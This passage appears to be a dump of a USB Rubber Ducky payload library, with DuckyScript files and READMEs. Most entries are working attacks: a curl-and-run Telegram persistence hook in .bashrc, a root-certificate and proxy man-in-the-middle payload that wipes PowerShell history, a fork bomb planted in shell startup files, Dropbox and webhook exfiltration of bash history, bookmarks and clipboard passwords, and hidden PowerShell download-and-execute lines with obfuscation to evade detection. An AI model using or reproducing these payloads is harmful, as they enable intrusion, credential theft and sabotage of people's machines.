about [Telegram Bot guide](#telegram-bot-guide). When you have create your personal Telegram Bot you should get the Telegram bot ID that you must put into the variable BOT_TOKEN at line 4 in the Python file as you can read in the line 3 comment.\n- **Python Script**: Download, edit as you want and upload the python script somewhere you want and put the file link into the file payload.txt replacing the example link.\n- **Persistence**: I preferred to create a mechanism that would allow you to create *some* persistence, not quite total, but you can have a high level of persistence. In this specific case, no permissions are needed, because it is sufficient to insert some lines in the .bashrc file that allow to keep the connection to Telegram open from the first time the user opens the terminal. Most of other mechanism needs the sudo permissions. \n\n### Telegram Bot Guide\n\n1. Search for `@botfather` in Telegram.\n2. Start a conversation with BotFather by clicking on the Start button.\n3. Type /newbot, and follow the prompts to set up a new bot.\n4. Select and copy the Bot Token that you can see after the registration and past it into the `BOT_TOKEN` python variable that you find in the `connection.py` file at line 3.\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
\n" }, { "path": "payloads/library/execution/Telegram_Persistent_Connection_Linux/connection.py", "content": "from telebot import TeleBot\n\n# Set here the Telegram bot token\nBOT_TOKEN = \"\"\nbot = TeleBot(BOT_TOKEN)\n\n@bot.message_handler(commands=['start'])\ndef send_welcome(message):\n\tbot.reply_to(message, \"Ok it works\")\n\nbot.infinity_polling()\n" }, { "path": "payloads/library/execution/Telegram_Persistent_Connection_Linux/payload.txt", "content": "REM #######################################################\nREM # |\nREM # Title : Telegram Persistent Connection Linux |\nREM # Author : Aleff |\nREM # Version : 1.0 |\nREM # Category : Execution |\nREM # Target : Linux |\nREM # |\nREM #######################################################\n\nREM Requirements:\nREM - Internet Connection\n\nREM Here you must put your own file link\nDEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py\n\nDELAY 1000\nCTRL-ALT t\nDELAY 2000\n\nSTRINGLN\n\tcurl -o connection.py #PYTHON-SCRIPT-LINK; python3 connection.py; echo \"if ! pgrep -f connection.py >/dev/null; then\n\tpython3 connection.py &\n\tfi\" >> .bashrc; exit\nEND_STRINGLN\n" }, { "path": "payloads/library/execution/UninstallSignal/README.md", "content": "# Uninstall Signal\n\nA script used to uninstall signal-desktop app on Windows users.\n\n**Category**: Execution\n\n## Description\n\nA script used to uninstall signal-desktop app on Windows users.\n\nOpen a PowerShell, stop the Signal proccess if it runs and then execute the uninstall file trhough general path.\n\n## Dependencies\n\n* Signal App installed (obviously LOL)\n* ExecutionPolicy Bypass\n\n## Settings\n\n- Nothing to set, this payload is Plug-And-Play <3\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
" }, { "path": "payloads/library/execution/UninstallSignal/payload.txt", "content": "REM #####################################\nREM # |\nREM # Title : Uninstall Signal |\nREM # Author : Aleff |\nREM # Version : 1.0 |\nREM # Category : Execution |\nREM # Target : Windows 10-11 |\nREM # |\nREM #####################################\n\nREM Plug-And-Play <3\n\nREM Requirements:\nREM - Signal App installed\nREM - ExecutionPolicy Bypass\n\nDELAY 2000\nGUI r\nDELAY 1000\nSTRING powershell\nENTER\nDELAY 2000\n\nSTRINGLN Stop-Process -Name \"Signal\"\nDELAY 500\nSTRINGLN Start-Process \"$env:LocalAppData\\Programs\\signal-desktop\\Uninstall Signal.exe\"\nDELAY 1000\nREM Popup \"Are you sure?\"\nENTER\nALT F4\n" }, { "path": "payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md", "content": "# Uninstall A Specific App On Windows Through Control Panel\n\nThis script can be used to uninstall a specific app on a Windows System.\n\n**Category**: Execution\n\n## Description\n\nThis script can be used to uninstall a specific app on a Windows System.\n\nThe script opens the research app and go to `Uninstall or change a program` page using the default path `Control Panel\\Programs\\Programs and Features`, then go to the search bar and write the app name, then got on the app, press space to select and enter to uninstall it.\n\nWhen uninstalling an application through the Windows Control Panel, it may not always be enough, especially for complex programs like antivirus software. In such cases, specific uninstaller applications are often required to ensure the complete removal of all components and avoid leaving behind residual files or registry entries. While most standard applications can be successfully uninstalled through the Control Panel, complex or security-related programs may benefit from using specific uninstaller applications for a more thorough and complete removal and, in that cases, this script doesn't work.\n\n**Unauthorized removal of an application is considered a crime** and can result in severe consequences. Tampering with system files without permission violates cybersecurity laws and can lead to legal penalties.\n\nIn addition to legal implications, **unauthorized removal of an application can also pose permanent risks to files and system functionality**. Applications are designed to work within a specific environment, and sudden or improper removal can cause instability, errors, and permanent data loss.\n\n## Dependencies\n\n* Set the exact name of the application as it appears within the control panel. Do not assume that just because an application is known by a certain name then it will have exactly that name, e.g. `Firefox` shows up again as `Mozilla Firefox (x64 en)`\n\n ```DuckyScript\n DEFINE #APP_NAME example\n ```\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Instagram\n 		\n \n \n \n
Discord\n
\n
\n" }, { "path": "payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt", "content": "REM ##############################################################################\nREM # |\nREM # Title : Uninstall A Specific App On Windows Through Control Panel |\nREM # Author : Aleff |\nREM # Version : 1.0 |\nREM # Category : Execution |\nREM # Target : Windows 10/11 |\nREM # |\nREM ##############################################################################\n\nREM Requirements:\nREM - The application you want to uninstall must be installed on the target (?obvious right? ^^)\n\nREM Note:\nREM - Payload tested on Windows 11 Eng \n\nREM Set the exact name of the application as it appears within the control panel. Do not assume that just because an application is known by a certain name then it will have exactly that name, e.g. `Firefox` shows up again as `Mozilla Firefox (x64 en)`\nDEFINE #APP_NAME example\n\n\nREM Open Windows research\nDELAY 2000\nGUI\nDELAY 1000\n\nREM Search and opern explorer app\nSTRING explorer\nENTER\nDELAY 1000\n\nREM Goto search bar and open \"Uninstall or change a program\" page\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nENTER\nDELAY 500\nSTRING Control Panel\\Programs\\Programs and Features\nENTER\nDELAY 1500\n\nREM Goto search bar and search the app\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nSTRING #APP_NAME\nDELAY 500\n\nREM Select the app and click on it\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nSPACE\nDELAY 500\nENTER\nDELAY 500\nENTER\nDELAY 2000\nALT F4\n" }, { "path": "payloads/library/execution/Win_HID_InvisableDesktopFolder/payload.txt", "content": "REM Title: Invisible Desktop Folder\r\nREM Author: Cribbit\r\nREM Description: Creates a some what invisible folder on the desktop.\r\nREM Target: Windows 10 with english language\r\nATTACKMODE HID\r\n\r\nEXTENSION DETECT_READY\r\n REM VERSION 1.1\r\n REM AUTHOR: Korben\r\n\r\n REM_BLOCK DOCUMENTATION\r\n USAGE:\r\n Extension runs inline (here)\r\n Place at beginning of payload (besides ATTACKMODE) to act as dynamic\r\n boot delay\r\n\r\n TARGETS:\r\n Any system that reflects CAPSLOCK will detect minimum required delay\r\n Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms\r\n END_REM\r\n\r\n REM CONFIGURATION:\r\n DEFINE #RESPONSE_DELAY 25\r\n DEFINE #ITERATION_LIMIT 120\r\n\r\n VAR $C = 0\r\n WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))\r\n CAPSLOCK\r\n DELAY #RESPONSE_DELAY\r\n $C = ($C + 1)\r\n END_WHILE\r\n CAPSLOCK\r\nEND_EXTENSION\r\n\r\nDELAY 1000\r\nREM Minimize all windows\r\nGUI m\r\nDELAY 100\r\nMENU\r\nDELAY 100\r\nREM Select Ne_w\r\nw\r\nREM Select _Folder\r\nf\r\nDELAY 100\r\nREM hold ALT and type 255 on keypad.\r\nINJECT_MOD\r\nHOLD ALT\r\nKPAD_2\r\nKPAD_5\r\nKPAD_5\r\nINJECT_MOD\r\nRELEASE ALT\r\nENTER\r\nDELAY 100\r\nMENU\r\nDELAY 100\r\nREM Select _Open\r\no\r\nREM Select Pr_operties\r\no\r\nDELAY 100\r\nENTER\r\nDELAY 100\r\nREM Move to tabs across the top\r\nSHIFT TAB\r\nSHIFT TAB\r\nDELAY 100\r\nREM Go across to customise \r\nRIGHTARROW\r\nRIGHTARROW\r\nRIGHTARROW\r\nRIGHTARROW\r\nREM Select Change _Icon\r\nALT i\r\nDELAY 100\r\nREM Move to selection window \r\nTAB\r\nTAB\r\nDELAY 100\r\nREM move right 13 time to select the clear icon.\r\nREM please check on your system that this is the case.\r\nVAR $MOVERIGHT = 13\r\nWHILE ( $MOVERIGHT > 0 )\r\n RIGHTARROW\r\n $MOVERIGHT = ( $MOVERIGHT - 1 )\r\nEND_WHILE\r\nDELAY 100\r\nREM Click OK twice\r\nENTER\r\nENTER" }, { "path": "payloads/library/execution/Win_HID_InvisableDesktopFolder/readme.md", "content": "# :mag: Invisible Desktop Folder\r\n* Author: Cribbit \r\n* Version: 1\r\n* Target: Windows 10 (English)\r\n* Category: Execution\r\n* Attackmode: HID\r\n\r\n## :book: Description\r\nCreates a somewhat invisible folder on the desktop.\r\nUses an invisible character for the name and a transparent icon.\r\nThis targets the English version of Windows. as it uses the underlined letters to select menu items and buttons.\r\n\r\n## :musical_note: Notes\r\nYou will need the define KPAD_2 and KPAD_5 in your language file:\r\n```JSON\r\n \"KPAD_SLASH\":\"00,00,54\",\r\n \"KPAD_ASTERISK\":\"00,00,55\",\r\n \"KPAD_MINUS\":\"00,00,56\",\r\n \"KPAD_PLUS\":\"00,00,57\",\r\n \"KPAD_ENTER\":\"00,00,58\",\r\n \"KPAD_1\":\"00,00,59\",\r\n \"KPAD_2\":\"00,00,5a\",\r\n \"KPAD_3\":\"00,00,5b\",\r\n \"KPAD_4\":\"00,00,5c\",\r\n \"KPAD_5\":\"00,00,5d\",\r\n \"KPAD_6\":\"00,00,5e\",\r\n \"KPAD_7\":\"00,00,5f\",\r\n \"KPAD_8\":\"00,00,60\",\r\n \"KPAD_9\":\"00,00,61\",\r\n \"KPAD_0\":\"00,00,62\",\r\n \"KPAD_DOT\":\"00,00,63\",\r\n```\r\n\r\n\r\n## :page_facing_up: Change Log\r\n| Version | Changes |\r\n| ------- | ------------------------------|\r\n| 1.0 | Initial release |" }, { "path": "payloads/library/execution/Windows-Duck-In-The-Middle/README.md", "content": "# Windows Duck In The Middle\n\n

\n \n \"VIEW\n \n \n \"TARGET:\n \n \n \"VERSION:\n \n

\n\nThis payload sets up a trustworthy proxy for the user, enabling a [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack). After executing your payload, the proxy server will intercept all the target user's network traffic.\n\n## Process\n\n1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.\n2. Creates a new virtual desktop.\n3. Opens a PowerShell window using the Windows+X menu.\n4. Runs PowerShell code that performs the following actions:\n- Downloads your certificate to a temporary file.\n- *Configures Firefox to accepts root user certificates for each profile.*\n- Configures and activates the proxy for the current user.\n- Deletes the temporary certificate file and PowerShell history, then closes the window.\n5. Confirms the addition of a trusted certificate in the confirmation dialog box.\n6. Closes the virtual desktop.\n7. *Disables USB Rubber Ducky*\n\n> [!NOTE]\n> No configuration is required for Chromium-based browsers since they accept user root certificates by default.\n\n## Prerequisites\n\nTo use this payload, you'll need a proxy server and a [root certificate](https://en.wikipedia.org/wiki/Root_certificate). The certificate must be downloadable from a website, either from your proxy server or from an online file hosting service such as [Dropbox](https://www.dropbox.com/). You can easily generate the certificate using tools such as [mitmproxy](https://mitmproxy.org/) or [Burp Suite](https://portswigger.net/burp).\n\n> [!WARNING]\n> To ensure the payload functions properly, generate the \"mitmproxy-ca-cert.pem\" certificate in the \"Other platforms\" section when using mitmproxy.\n\n## Options\n\n|Required options|Data type|Default value|Description|\n|-|-|-|-|\n|CERT_URL|String|example.com|The download link for your Trusted Root CA certificate|\n|PROXY_IP|String|127.0.0.1|Your proxy's IP address|\n|PROXY_PORT|Integer|8080|Your proxy port|\n\n|Advanced options|Data type|Default value|Description|\n|-|-|-|-|\n|SHORT_DELAY|Integer|500|Short delay time|\n|MEDIUM_DELAY|Integer|2000|Medium delay time|\n|LONG_DELAY|Integer|4000|Long delay time|\n|CONFIGURE_FIREFOX|Boolean|TRUE|Configures Firefox to accepts root user certificates for each profile|\n|DISABLE_AFTER_EXECUTION|Boolean|TRUE|Disables USB Rubber Ducky after payload execution|\n\n## Contributors\n\n- [PlumpyTurkey](https://codeberg.org/PlumpyTurkey)\n" }, { "path": "payloads/library/execution/Windows-Duck-In-The-Middle/payload.txt", "content": "REM_BLOCK DOCUMENTATION\n Title: Windows Duck In The Middle\n Author: PlumpyTurkey\n Description: This payload sets up a trustworthy proxy for the user, enabling a Man-in-the-middle attack.\n Target: Windows 10, 11\n Version: 1.0\n Category: Execution\nEND_REM\n\nREM Required options:\nDEFINE #CERT_URL example.com\nDEFINE #PROXY_IP 127.0.0.1\nDEFINE #PROXY_PORT 8080\n\nREM Advanced options:\nDEFINE #SHORT_DELAY 500\nDEFINE #MEDIUM_DELAY 2000\nDEFINE #LONG_DELAY 4000\nDEFINE #CONFIGURE_FIREFOX TRUE\nDEFINE #DISABLE_AFTER_EXECUTION TRUE\n\nEXTENSION PASSIVE_WINDOWS_DETECT\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n Windows fully passive OS Detection and passive Detect Ready\n Includes its own passive detect ready.\n Does not require additional extensions.\n\n USAGE:\n Extension runs inline (here)\n Place at beginning of payload (besides ATTACKMODE) to act as dynamic\n boot delay\n $_OS will be set to WINDOWS or NOT_WINDOWS\n See end of payload for usage within payload\n END_REM\n\n REM CONFIGURATION:\n DEFINE #MAX_WAIT 150\n DEFINE #CHECK_INTERVAL 20\n DEFINE #WINDOWS_HOST_REQUEST_COUNT 2\n DEFINE #NOT_WINDOWS 7\n\n $_OS = #NOT_WINDOWS\n\n VAR $MAX_TRIES = #MAX_WAIT\n WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))\n DELAY #CHECK_INTERVAL\n $MAX_TRIES = ($MAX_TRIES - 1)\n END_WHILE\n IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN\n $_OS = WINDOWS\n END_IF\n\n REM_BLOCK EXAMPLE USAGE AFTER EXTENSION\n IF ($_OS == WINDOWS) THEN\n STRING HELLO WINDOWS!\n ELSE\n STRING HELLO WORLD!\n END_IF\n END_REM\nEND_EXTENSION\n\nEXTENSION WINDOWS_ONLY \n REM VERSION 1.0\n REM AUTHOR: Korben\n\n DEFINE #FAILURE_LED TRUE\n DEFINE #FAILURE_LED_MODE LED_R\n DEFINE #FAILURE_ATTACKMODE ATTACKMODE OFF\n\n IF (($_OS == WINDOWS) == FALSE) THEN\n IF_DEFINED_TRUE #FAILURE_LED\n #FAILURE_LED_MODE\n DELAY 500\n #FAILURE_LED_MODE\n DELAY 500\n #FAILURE_LED_MODE\n END_IF_DEFINED\n #FAILURE_ATTACKMODE\n STOP_PAYLOAD\n END_IF\nEND_EXTENSION\n\nCTRL GUI d\nGUI x\n\nDELAY #SHORT_DELAY\nSTRING i\n\nDELAY #MEDIUM_DELAY\nSTRING_POWERSHELL\n Clear-Host; \n $c = New-TemporaryFile; \n try { \n Invoke-WebRequest -UseBasicParsing -Uri \"#CERT_URL\" -OutFile $c; \n Import-Certificate -FilePath $c -CertStoreLocation \"Cert:\\CurrentUser\\Root\"; \nEND_STRING\n\nIF_DEFINED_TRUE #CONFIGURE_FIREFOX\n STRING_POWERSHELL\n if (Test-Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\") { \n Get-ChildItem -Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\" -Filter \"prefs.js\" -Recurse | ForEach-Object { \n (Get-Content $_.FullName) -replace '\"security.enterprise_roots.enabled\", false','\"security.enterprise_roots.enabled\", true' | Set-Content $_.FullName \n } \n }; \n END_STRING\nEND_IF_DEFINED\n\nSTRING_POWERSHELL\n @{ \"ProxyServer\" = \"#PROXY_IP:#PROXY_PORT\"; \"ProxyEnable\" = \"1\" }.GetEnumerator() | ForEach-Object { \n Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" -Name $_.Name -Value $_.Value \n } \n } \n finally { \n Remove-Item $c; \n Remove-Item (Get-PSReadLineOption).HistorySavePath; \n exit \n }\nEND_STRING\n\nENTER\n\nDELAY #LONG_DELAY\nALT TAB\n\nDELAY #SHORT_DELAY\nTAB\nENTER\n\nCTRL GUI F4\n\nIF_DEFINED_TRUE #DISABLE_AFTER_EXECUTION\n ATTACKMODE OFF\nEND_IF_DEFINED\n" }, { "path": "payloads/library/execution/termBomb/payload.txt", "content": "REM Title: termBomb\nREM Description: termBomb prompts message \"!!!!!!YOU HAVE BEEN HACKED!!!!!!\" and executes fork bomb on launching shell/terminal.\nREM Author: drapl0n\nREM Version: 1.0\nREM Category: Execution\nREM Target: Unix-like operating systems.\nREM Attackmode: HID\n\nDELAY 400\nCTRL-ALT t\nDELAY 400\nSTRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE\nENTER\nSTRING cat < /tmp/tmppp\nENTER\nSTRING ls -a | grep 'zshrc' &> /dev/null\nENTER \nSTRING if [ 0 = 0 ]; then\nENTER\nSTRING echo -e \"echo -e \\\"\"'!!!!!!YOU HAVE BEEN HACKED!!!!!!\"'\"\\necho -e \\\"\"'!!!!!!YOU HAVE BEEN HACKED!!!!!!\"'\"\\necho -e \\\"\"'!!!!!!YOU HAVE BEEN HACKED!!!!!!\"'\"\\necho -e \\\"\"'!!!!!!YOU HAVE BEEN HACKED!!!!!!\"'\"\\necho -e \\\"\"'!!!!!!YOU HAVE BEEN HACKED!!!!!!\"'\"\\necho -e \\\"\"'!!!!!!YOU HAVE BEEN HACKED!!!!!!\"'\"\\necho -e \\\"\"'!!!!!!YOU HAVE BEEN HACKED!!!!!!\"'\"\\necho -e \\\"\"'!!!!!!YOU HAVE BEEN HACKED!!!!!!\"'\"\" >> ~/.zshrc\nENTER\nSTRING echo \":(){ :|:& };:\" >> ~/.zshrc\nENTER\nSTRING fi\nENTER\nENTER\nSTRING ls -a | grep 'bashrc' &> /dev/null\nENTER\nSTRING if [ 0 = 0 ]; then\nENTER\nSTRING echo -e \"echo -e \\\"\"'!!!!!!YOU HAVE BEEN HACKED!!!!!!\"'\"\\necho -e \\\"\"'!!!!!!YOU HAVE BEEN HACKED!!!!!!\"'\"\\necho -e \\\"\"'!!!!!!YOU HAVE BEEN HACKED!!!!!!\"'\"\\necho -e \\\"\"'!!!!!!YOU HAVE BEEN HACKED!!!!!!\"'\"\\necho -e \\\"\"'!!!!!!YOU HAVE BEEN HACKED!!!!!!\"'\"\\necho -e \\\"\"'!!!!!!YOU HAVE BEEN HACKED!!!!!!\"'\"\\necho -e \\\"\"'!!!!!!YOU HAVE BEEN HACKED!!!!!!\"'\"\\necho -e \\\"\"'!!!!!!YOU HAVE BEEN HACKED!!!!!!\"'\"\" >> ~/.bashrc\nENTER\nSTRING echo \":(){ :|:& };:\" >> ~/.bashrc\nENTER\nSTRING fi\nENTER\nSTRING EOF\nENTER\nDELAY 300\nSTRING chmod +x /tmp/tmppp && /tmp/./tmppp && rm /tmp/tmppp\nENTER\nSTRING exit\nENTER\n" }, { "path": "payloads/library/exfiltration/Bash-History/payload.txt", "content": "REM Title: Bash-History\nREM Author: Zoe Ronen\nREM Description: This payload is meant to exfiltrate bash history to a dropbox\nREM Target: Linux/Xfce4\n\nREM replace the [DROPBOX_ACCESS_TOKEN] placeholder with your actual Dropbox access token\nDEFINE #API_TOKEN [DROPBOX_ACCESS_TOKEN]\n\nDELAY 500\nALT-F2\nDELAY 500\nSTRING xfce4-terminal\nDELAY 500\nENTER\nDELAY 500\nSTRING curl -X POST https://content.dropboxapi.com/2/files/upload\nSPACE\nSTRING --header \"Authorization: Bearer\nSPACE\nSTRING #API_TOKEN\nSTRING \" --header \"Dropbox-API-Arg: {\\\"path\\\": \\\"/home/$USER/.bash_history\\\"}\"\nSPACE\nSTRING --header \"Content-Type: application/octet-stream\" --data-binary @.bash_history\nDELAY 500\nENTER\nDELAY 500\nSTRING exit\nDELAY 500\nENTER\n" }, { "path": "payloads/library/exfiltration/Bookmark-Hog/BH.ps1", "content": "#Bookmark-Hog\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks\" -PathType Leaf\r\n\r\n#If the file does not exist, write to host.\r\nif (-not(Test-Path -Path \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks\" -PathType Leaf)) {\r\n try {\r\n Write-Host \"The chrome bookmark file has not been found. \"\r\n }\r\n catch {\r\n throw $_.Exception.Message\r\n }\r\n }\r\n # Copy Chrome Bookmarks to Bash Bunny\r\n else {\r\n $F1 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_bookmarks.txt\"\r\n Copy-Item \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks\" -Destination \"$env:tmp/$F1\" \r\n }\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks\" -PathType Leaf\r\n\r\n#If the file does not exist, write to host.\r\nif (-not(Test-Path -Path \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks\" -PathType Leaf)) {\r\n try {\r\n Write-Host \"The edge bookmark file has not been found. \"\r\n }\r\n catch {\r\n throw $_.Exception.Message\r\n }\r\n}\r\n # Copy Chrome Bookmarks to Bash Bunny\r\n else {\r\n $F2 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_bookmarks.txt\"\r\n Copy-Item \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks\" -Destination \"$env:tmp/$F2\" \r\n}\r\n\r\nfunction DropBox-Upload {\r\n\r\n [CmdletBinding()]\r\n param (\r\n \r\n [Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n [Alias(\"f\")]\r\n [string]$SourceFilePath\r\n ) \r\n $DropBoxAccessToken = \"YOUR ACCESS TOKEN\" # Replace with your DropBox Access Token\r\n $outputFile = Split-Path $SourceFilePath -leaf\r\n $TargetFilePath=\"/$outputFile\"\r\n $arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n $authorization = \"Bearer \" + $DropBoxAccessToken\r\n $headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n $headers.Add(\"Authorization\", $authorization)\r\n $headers.Add(\"Dropbox-API-Arg\", $arg)\r\n $headers.Add(\"Content-Type\", 'application/octet-stream')\r\n Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n }\r\n\r\nDropBox-Upload -f \"$env:tmp/$F1\"\r\nDropBox-Upload -f \"$env:tmp/$F2\"\r\n\r\n$done = New-Object -ComObject Wscript.Shell;$done.Popup(\"Driver Updated\",1)\r\n" }, { "path": "payloads/library/exfiltration/Bookmark-Hog/README.md", "content": "\n\n

\n \n \n \n

\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# Bookmark-Hog\n\nA payload to exfiltrate bookmarks of the 2 most popular browsers\n\n## Description\n\nThis payload will enumerate through the browser directories, looking for the file that stores the bookmark history\n\nThese files will be saved to the temp directory\n\nFinally dropbox will be used to exfiltrate the files to cloud storage\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10,11\n\n

(back to top)

\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

📱 My Socials 📱

\n
\n\n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Jsonnet\"\n \n
I-Am-Jakoby's Discord\n
\n
\n\n

(back to top)

\n\n\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n

(back to top)

\n" }, { "path": "payloads/library/exfiltration/Bookmark-Hog/payload.txt", "content": "REM Title: Bookmark-Hog\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate bookmarks to the rubber ducky\r\n\r\nREM Target: Windows 10, 11\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\nREM Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1\r\n" }, { "path": "payloads/library/exfiltration/ClipBoard-Creep/README.md", "content": "# Clipboard-Creep #\r\nClipboard-Creep is a basic script which tracks the users clipboard and exfiltrates it contents. It was created to get access to passwords copied out of password managers, but might be useful in general.\r\n\r\n\r\n## Usage ##\r\n### #HOOK ###\r\nDefine your webhook under #HOOK\r\n\r\n![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png)\r\n\r\n### #CALLBACK_DELAY ###\r\nDefine a timer under #CALLBACK_DELAY. This defines the pause between calls to your webhook. A default of 12 seconds was choosen to capture potential passwords, in clipboards of password managers.\r\n\r\n![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png)\r\n\r\nAfter successful execution you'll see the contents of your targets clipboard or simply signs of life flying into your webhook. \r\n![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png)\r\n" }, { "path": "payloads/library/exfiltration/ClipBoard-Creep/payload.txt", "content": "REM Clipboard-Creep\r\nREM Version 1.0\r\nREM OS: Windows\r\nREM Author: 0i41E\r\nREM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum\r\nREM This payload aims on the targets clipboard. Define a webhook plug in your payload and observe the clipboard content on your catching server.\r\nREM Based on Clipboard-Creep.ps1 - https://github.com/0i41E/ClipBoard-Creep\r\n\r\n\r\nEXTENSION PASSIVE_WINDOWS_DETECT\r\n REM VERSION 1.1\r\n REM AUTHOR: Korben\r\n\r\n REM_BLOCK DOCUMENTATION\r\n Windows fully passive OS Detection and passive Detect Ready\r\n Includes its own passive detect ready.\r\n Does not require additional extensions.\r\n\r\n USAGE:\r\n Extension runs inline (here)\r\n Place at beginning of payload (besides ATTACKMODE) to act as dynamic\r\n boot delay\r\n $_OS will be set to WINDOWS or NOT_WINDOWS\r\n See end of payload for usage within payload\r\n END_REM\r\n\r\n REM CONFIGURATION:\r\n DEFINE #MAX_WAIT 150\r\n DEFINE #CHECK_INTERVAL 20\r\n DEFINE #WINDOWS_HOST_REQUEST_COUNT 2\r\n DEFINE #NOT_WINDOWS 7\r\n\r\n $_OS = #NOT_WINDOWS\r\n\r\n VAR $MAX_TRIES = #MAX_WAIT\r\n WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))\r\n DELAY #CHECK_INTERVAL\r\n $MAX_TRIES = ($MAX_TRIES - 1)\r\n END_WHILE\r\n IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN\r\n $_OS = WINDOWS\r\n END_IF\r\n\r\n REM_BLOCK EXAMPLE USAGE AFTER EXTENSION\r\n IF ($_OS == WINDOWS) THEN\r\n STRING HELLO WINDOWS!\r\n ELSE\r\n STRING HELLO WORLD!\r\n END_IF\r\n END_REM\r\nEND_EXTENSION\r\n\r\nEXTENSION EXTENSION Rolling_Powershell_Execution\r\n REM VERSION 1.0\r\n REM Author: 0i41E\r\n REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek\r\n REM Requirements: PayloadStudio v.1.3 minimum\r\n REM Starts Powershell in uncommon ways to avoid basic detection\r\n REM Via randomisation, obfuscation and usage of less used parameters, this extension helps to evade basic detection.\r\n\r\n REM CONFIGURATION:\r\n REM Add ExecutionPolicy bypass\r\n DEFINE #EXECUTIONPOLICY FALSE\r\n DEFINE #DELAY 500\r\n\r\n $_RANDOM_MIN = 1\r\n $_RANDOM_MAX = 16\r\n VAR $RANDOM_PS = $_RANDOM_INT\r\n FUNCTION Rolling_Powershell_Execution()\r\n IF ($RANDOM_PS == 1) THEN\r\n STRING cmd.exe /c \"p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid\"\r\n ELSE IF ($RANDOM_PS == 2) THEN\r\n STRING cmd.exe /c \"PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi\"\r\n ELSE IF ($RANDOM_PS == 3) THEN\r\n STRING cmd.exe /c 